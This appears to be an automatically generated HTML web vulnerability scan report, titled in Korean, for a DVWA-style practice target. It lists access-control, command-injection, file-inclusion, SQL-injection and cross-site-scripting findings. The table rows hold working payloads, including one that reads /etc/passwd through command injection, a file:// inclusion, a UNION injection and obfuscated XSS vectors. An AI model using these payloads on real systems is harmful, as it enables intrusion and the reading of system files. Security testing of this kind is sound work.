
    <html>
    <head>
        <style>
            @import url('https://fonts.googleapis.com/css2?family=Montserrat:wght@400;700&display=swap');

            body {
                font-family: 'Montserrat', sans-serif;
                line-height: 1.5;
                color: #333333;
                background-color: #f9f9f9;
                padding: 30px;
                margin: 0;
            }

            h1 {
                font-size: 28px;
                text-align: center;
                margin-bottom: 30px;
            }

            .chart-container {
                display: flex;
                justify-content: center;
                margin-bottom: 30px;
            }

            .chart-container img {
                max-width: 100%;
                height: auto;
            }

            .container {
                margin-bottom: 30px;
            }

            table {
                border-collapse: collapse;
                width: 100%;
                margin-bottom: 20px;
                table-layout: auto;
            }

            th,
            td {
                padding: 10px 15px;
                border: 1px solid #e0e0e0;
                word-wrap: break-word;
                text-align: center;
            }

            th {
                background-color: #f5f5f5;
                font-weight: bold;
            }

            .payload-box {
                flex-wrap: wrap;
                margin-top: 10px;
            }

            .payload-item {
                margin-bottom: 3px;
                text-align: left;
            }

            .payload-key {
                font-weight: bold;
            }

            .payload-value {
                margin-left: 3px;
            }
        </style>
    </head>

    <body>
        <h1>웹 취약점 점검 레포트</h1>

        <div class="chart-container">
            <img src="vulnerability_chart.png" alt="Vulnerability Chart">
        </div>

        <br>
        <br>

        <div class="container">
            <h3>Vulnerability Summary</h2>
            <table>
        <tr>
            <th>Vulnerability</th>
            <th>Count</th>
        </tr>
    <tr><td>Broken Access Control</td><td>3</td></tr><tr><td>Command Injection</td><td>1</td></tr><tr><td>Local File Inclusion</td><td>1</td></tr><tr><td>SQL Injection</td><td>1</td></tr><tr><td>Cross-site scripting</td><td>3</td></tr><tr><td colspan='4' style='text-align: right;'><b>Total:</b> 9 </td></tr></table>
        </div>

        <br>
        <br>
        
        <div class="container">
            <h3>Testing Information</h2>
            <table>
        <tr>
            <th style="width: 200px; max-width: 200px;">Vulnerability</th>
            <th>URL</th>
            <th style="width: 100px; max-width: 120px;">Method</th>
            <th>Payload</th>
        </tr>
    
            <tr>
                <td>Broken Access Control</td>
                <td><a href='http://ubuntu.seokj.is119.kr:8119/config'>http://ubuntu.seokj.is119.kr:8119/config</a></td>
                <td></td>
                <td></td>
            </tr>
        
            <tr>
                <td>Broken Access Control</td>
                <td><a href='http://ubuntu.seokj.is119.kr:8119/phpinfo.php'>http://ubuntu.seokj.is119.kr:8119/phpinfo.php</a></td>
                <td></td>
                <td></td>
            </tr>
        
            <tr>
                <td>Broken Access Control</td>
                <td><a href='http://ubuntu.seokj.is119.kr:8119/php.ini'>http://ubuntu.seokj.is119.kr:8119/php.ini</a></td>
                <td></td>
                <td></td>
            </tr>
        
            <tr>
                <td>Command Injection</td>
                <td><a href='http://ubuntu.seokj.is119.kr:8119/vulnerabilities/exec/'>http://ubuntu.seokj.is119.kr:8119/vulnerabilities/exec/</a></td>
                <td>POST</td>
                <td><div class='payload-box'><div class='payload-item'><span class='payload-key'>ip:</span> <span class='payload-value'>|&#x27;ca&#x27;t /etc/passwd</span></div><br></div></td>
            </tr>
        
            <tr>
                <td>Local File Inclusion</td>
                <td><a href='http://ubuntu.seokj.is119.kr:8119/vulnerabilities/fi/?page='>http://ubuntu.seokj.is119.kr:8119/vulnerabilities/fi/?page=</a></td>
                <td>GET</td>
                <td><div class='payload-box'><div class='payload-item'><span class='payload-key'>url:</span> <span class='payload-value'>http://ubuntu.seokj.is119.kr:8119/vulnerabilities/fi/?page=file:///etc/passwd</span></div><br></div></td>
            </tr>
        
            <tr>
                <td>SQL Injection</td>
                <td><a href='http://ubuntu.seokj.is119.kr:8119/vulnerabilities/sqli/session-input.php'>http://ubuntu.seokj.is119.kr:8119/vulnerabilities/sqli/session-input.php</a></td>
                <td>POST</td>
                <td><div class='payload-box'><div class='payload-item'><span class='payload-key'>id:</span> <span class='payload-value'>&#x27; union select 1, hex(&quot;fu&quot; &quot;&quot; &quot;zz&quot;)-- xx</span></div><br><div class='payload-item'><span class='payload-key'>Submit:</span> <span class='payload-value'>Submit</span></div><br></div></td>
            </tr>
        
            <tr>
                <td>Cross-site scripting</td>
                <td><a href='http://ubuntu.seokj.is119.kr:8119/vulnerabilities/sqli/session-input.php'>http://ubuntu.seokj.is119.kr:8119/vulnerabilities/sqli/session-input.php</a></td>
                <td>POST</td>
                <td><div class='payload-box'><div class='payload-item'><span class='payload-key'>id:</span> <span class='payload-value'>document.body.innerHTML+=&quot;&lt;a href=&quot;#&quot;  id=&quot;fuzz&quot; ONMOuSEMoVe=&quot;alert`67777`&quot;&gt;click&quot;;</span></div><br><div class='payload-item'><span class='payload-key'>Submit:</span> <span class='payload-value'>document.body.innerHTML+=&quot;&lt;a href=&quot;#&quot;  id=&quot;fuzz&quot; ONMOuSEMoVe=&quot;alert`67777`&quot;&gt;click&quot;;</span></div><br></div></td>
            </tr>
        
            <tr>
                <td>Cross-site scripting</td>
                <td><a href='http://ubuntu.seokj.is119.kr:8119/vulnerabilities/xss_r/'>http://ubuntu.seokj.is119.kr:8119/vulnerabilities/xss_r/</a></td>
                <td>GET</td>
                <td><div class='payload-box'><div class='payload-item'><span class='payload-key'>name:</span> <span class='payload-value'>&lt;svg onload=innerHTML=nextSibling.innerText&gt;&lt;b&gt;&amp;lt;img/src/on&lt;b&gt;&lt;/b&gt;error=al&lt;b&gt;&lt;/b&gt;ert(67777)&gt;&lt;/b&gt;</span></div><br></div></td>
            </tr>
        
            <tr>
                <td>Cross-site scripting</td>
                <td><a href='http://ubuntu.seokj.is119.kr:8119/vulnerabilities/xss_s/'>http://ubuntu.seokj.is119.kr:8119/vulnerabilities/xss_s/</a></td>
                <td>POST</td>
                <td><div class='payload-box'><div class='payload-item'><span class='payload-key'>txtName:</span> <span class='payload-value'>&lt;img src=&quot;invalid.jpg&quot;  id=&quot;fuzz&quot; onmousedown=&quot;top[&#x27;al\x65rt&#x27;](67777)&quot;&gt;click</span></div><br><div class='payload-item'><span class='payload-key'>btnSign:</span> <span class='payload-value'>&lt;img src=&quot;invalid.jpg&quot;  id=&quot;fuzz&quot; onmousedown=&quot;top[&#x27;al\x65rt&#x27;](67777)&quot;&gt;click</span></div><br><div class='payload-item'><span class='payload-key'>btnClear:</span> <span class='payload-value'>&lt;img src=&quot;invalid.jpg&quot;  id=&quot;fuzz&quot; onmousedown=&quot;top[&#x27;al\x65rt&#x27;](67777)&quot;&gt;click</span></div><br></div></td>
            </tr>
        </table>
        </div>
    </body>

    </html>
    